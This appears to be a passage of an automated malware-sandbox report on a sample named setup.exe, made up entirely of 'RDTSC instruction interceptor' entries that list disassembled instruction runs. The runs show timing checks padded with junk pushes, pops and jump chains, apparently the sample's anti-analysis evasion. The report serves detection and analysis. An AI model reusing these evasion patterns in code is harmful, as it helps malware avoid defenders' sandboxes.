                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0A06 second address: 4DD0A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0A23 second address: 4DD0A63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FF32CDD6577h 0x00000010 mov bx, si 0x00000013 pop esi 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, di 0x0000001f mov bl, D8h 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DD0A63 second address: 4DD0AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 5785811Bh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF32CFB71FEh 0x00000018 xor si, E9E8h 0x0000001d jmp 00007FF32CFB71FBh 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov edi, 735172C4h 0x00000030 push ebx 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80051 second address: 4D800C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 pushfd 0x00000011 jmp 00007FF32CDD6578h 0x00000016 sub cl, FFFFFF98h 0x00000019 jmp 00007FF32CDD656Bh 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 jmp 00007FF32CDD6570h 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FF32CDD6570h 0x0000002f add cx, 4228h 0x00000034 jmp 00007FF32CDD656Bh 0x00000039 popfd 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D800C9 second address: 4D8010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e mov cl, bl 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FF32CFB7206h 0x00000017 sbb ch, FFFFFFB8h 0x0000001a jmp 00007FF32CFB71FBh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx ebx, ax 0x00000028 push eax 0x00000029 pop edi 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D8010B second address: 4D80111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80111 second address: 4D80131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF32CFB71FEh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ecx, 03CFC963h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80131 second address: 4D8017D instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007FF32CDD656Bh 0x0000000e and si, 1B8Eh 0x00000013 jmp 00007FF32CDD6579h 0x00000018 popfd 0x00000019 popad 0x0000001a popad 0x0000001b mov ebx, dword ptr [ebp+10h] 0x0000001e jmp 00007FF32CDD656Dh 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D8017D second address: 4D80181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80181 second address: 4D80185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80185 second address: 4D8018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D8018B second address: 4D80206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6572h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CDD656Bh 0x0000000f xchg eax, esi 0x00000010 jmp 00007FF32CDD6576h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 mov dl, al 0x0000001b jmp 00007FF32CDD6573h 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 jmp 00007FF32CDD6576h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF32CDD656Eh 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80206 second address: 4D80239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b jmp 00007FF32CFB71FFh 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF32CFB7205h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80239 second address: 4D8023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D8023F second address: 4D80253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FF39F5E55C4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80253 second address: 4D80257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80257 second address: 4D8025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D8025B second address: 4D80261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80261 second address: 4D802DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 push ecx 0x00000014 mov ax, bx 0x00000017 pop edx 0x00000018 popad 0x00000019 je 00007FF39F5E5599h 0x0000001f jmp 00007FF32CFB7206h 0x00000024 mov edx, dword ptr [esi+44h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007FF32CFB71FDh 0x0000002f pushfd 0x00000030 jmp 00007FF32CFB7200h 0x00000035 or eax, 1C579368h 0x0000003b jmp 00007FF32CFB71FBh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D802DB second address: 4D80355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6572h 0x00000009 xor eax, 7880E5C8h 0x0000000f jmp 00007FF32CDD656Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b jmp 00007FF32CDD6576h 0x00000020 test edx, 61000000h 0x00000026 pushad 0x00000027 call 00007FF32CDD656Dh 0x0000002c push esi 0x0000002d pop ebx 0x0000002e pop ecx 0x0000002f popad 0x00000030 jne 00007FF39F4048B7h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF32CDD6576h 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80355 second address: 4D8035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D8035B second address: 4D8035F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D8035F second address: 4D80371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80371 second address: 4D80375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80375 second address: 4D8037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D8037B second address: 4D803AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov dl, 95h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FF39F404881h 0x00000011 jmp 00007FF32CDD656Eh 0x00000016 test bl, 00000007h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, 7F60h 0x00000020 mov edx, 57E2318Ch 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70876 second address: 4D708DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 27h 0x00000005 jmp 00007FF32CFB7204h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f call 00007FF32CFB71FEh 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007FF32CFB71FDh 0x00000020 jmp 00007FF32CFB71FBh 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF32CFB7205h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D708DC second address: 4D709B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6577h 0x00000009 and eax, 27D16CAEh 0x0000000f jmp 00007FF32CDD6579h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov edx, 5274DA0Eh 0x00000021 call 00007FF32CDD656Fh 0x00000026 call 00007FF32CDD6578h 0x0000002b pop esi 0x0000002c pop ebx 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f jmp 00007FF32CDD656Eh 0x00000034 mov esi, dword ptr [ebp+08h] 0x00000037 jmp 00007FF32CDD6570h 0x0000003c sub ebx, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FF32CDD656Ah 0x00000047 and ah, 00000018h 0x0000004a jmp 00007FF32CDD656Bh 0x0000004f popfd 0x00000050 pushfd 0x00000051 jmp 00007FF32CDD6578h 0x00000056 adc cl, 00000078h 0x00000059 jmp 00007FF32CDD656Bh 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D709B7 second address: 4D70A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF32CFB71FFh 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f jmp 00007FF32CFB7202h 0x00000014 je 00007FF39F5ECBA2h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF32CFB71FEh 0x00000021 sub eax, 43B94D38h 0x00000027 jmp 00007FF32CFB71FBh 0x0000002c popfd 0x0000002d mov ah, 67h 0x0000002f popad 0x00000030 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000037 jmp 00007FF32CFB71FBh 0x0000003c mov ecx, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70A27 second address: 4D70A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70A2B second address: 4D70A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70A31 second address: 4D70AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6578h 0x00000009 adc cx, F1F8h 0x0000000e jmp 00007FF32CDD656Bh 0x00000013 popfd 0x00000014 jmp 00007FF32CDD6578h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007FF39F40BE90h 0x00000022 pushad 0x00000023 jmp 00007FF32CDD656Eh 0x00000028 push esi 0x00000029 mov ecx, edx 0x0000002b pop edx 0x0000002c popad 0x0000002d test byte ptr [77436968h], 00000002h 0x00000034 jmp 00007FF32CDD6578h 0x00000039 jne 00007FF39F40BE6Ah 0x0000003f jmp 00007FF32CDD6570h 0x00000044 mov edx, dword ptr [ebp+0Ch] 0x00000047 jmp 00007FF32CDD6570h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF32CDD6577h 0x00000054 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70AF5 second address: 4D70B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c mov ah, 71h 0x0000000e pop edi 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 or cl, 00000038h 0x00000018 jmp 00007FF32CFB71FBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF32CFB7204h 0x00000027 xor esi, 6FA05A98h 0x0000002d jmp 00007FF32CFB71FBh 0x00000032 popfd 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007FF32CFB7206h 0x0000003b sub eax, 7A5D04F8h 0x00000041 jmp 00007FF32CFB71FBh 0x00000046 popfd 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70B91 second address: 4D70BD8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6578h 0x00000008 and si, 5F58h 0x0000000d jmp 00007FF32CDD656Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF32CDD6575h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70BD8 second address: 4D70BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CFB71FCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70BE8 second address: 4D70BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d push eax 0x0000000e push edx 0x0000000f movzx esi, di 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70BFA second address: 4D70C06 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70C06 second address: 4D70C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007FF32CDD656Bh 0x0000000d and al, FFFFFFDEh 0x00000010 jmp 00007FF32CDD6579h 0x00000015 popfd 0x00000016 popad 0x00000017 push dword ptr [ebp+14h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF32CDD656Dh 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70C75 second address: 4D70C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70C79 second address: 4D70C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6578h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70C95 second address: 4D70CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF32CFB7205h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D70CBC second address: 4D70CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007FF32CDD656Eh 0x0000000f mov esp, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF32CDD6577h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80D7D second address: 4D80D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80D8C second address: 4D80DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, F0h 0x00000005 pushfd 0x00000006 jmp 00007FF32CDD6570h 0x0000000b adc ecx, 6D1D8CD8h 0x00000011 jmp 00007FF32CDD656Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF32CDD6574h 0x00000022 xor ch, 00000038h 0x00000025 jmp 00007FF32CDD656Bh 0x0000002a popfd 0x0000002b mov edi, ecx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bx, 3280h 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80AD7 second address: 4D80ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80ADD second address: 4D80B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80B01 second address: 4D80B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80B05 second address: 4D80B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80B0B second address: 4D80B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CFB7203h 0x00000008 pop ecx 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF32CFB71FCh 0x00000019 jmp 00007FF32CFB7205h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80B52 second address: 4D80B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF32CDD6576h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF32CDD656Ah 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D80B94 second address: 4D80B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4E0073D second address: 4E00765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CDD656Bh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CDD6570h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF09EF second address: 4DF09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF09F3 second address: 4DF0A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0A10 second address: 4DF0A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0A16 second address: 4DF0A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0A1A second address: 4DF0A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0A28 second address: 4DF0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0A2E second address: 4DF0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0A32 second address: 4DF0A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF080B second address: 4DF0848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF32CFB71FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CFB71FEh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0848 second address: 4DF085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF085A second address: 4DF0883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF32CFB7205h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0883 second address: 4DF08A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CDD656Dh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0C27 second address: 4DF0CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB7201h 0x00000009 or cx, AB96h 0x0000000e jmp 00007FF32CFB7201h 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c movzx esi, dx 0x0000001f call 00007FF32CFB71FBh 0x00000024 pushfd 0x00000025 jmp 00007FF32CFB7208h 0x0000002a or ecx, 048D1E18h 0x00000030 jmp 00007FF32CFB71FBh 0x00000035 popfd 0x00000036 pop eax 0x00000037 popad 0x00000038 mov dword ptr [esp], ebp 0x0000003b jmp 00007FF32CFB71FFh 0x00000040 mov ebp, esp 0x00000042 pushad 0x00000043 mov ebx, esi 0x00000045 mov dx, si 0x00000048 popad 0x00000049 push dword ptr [ebp+0Ch] 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF32CFB7209h 0x00000053 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4DF0CCF second address: 4DF0CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Ch 0x00000009 rdtsc
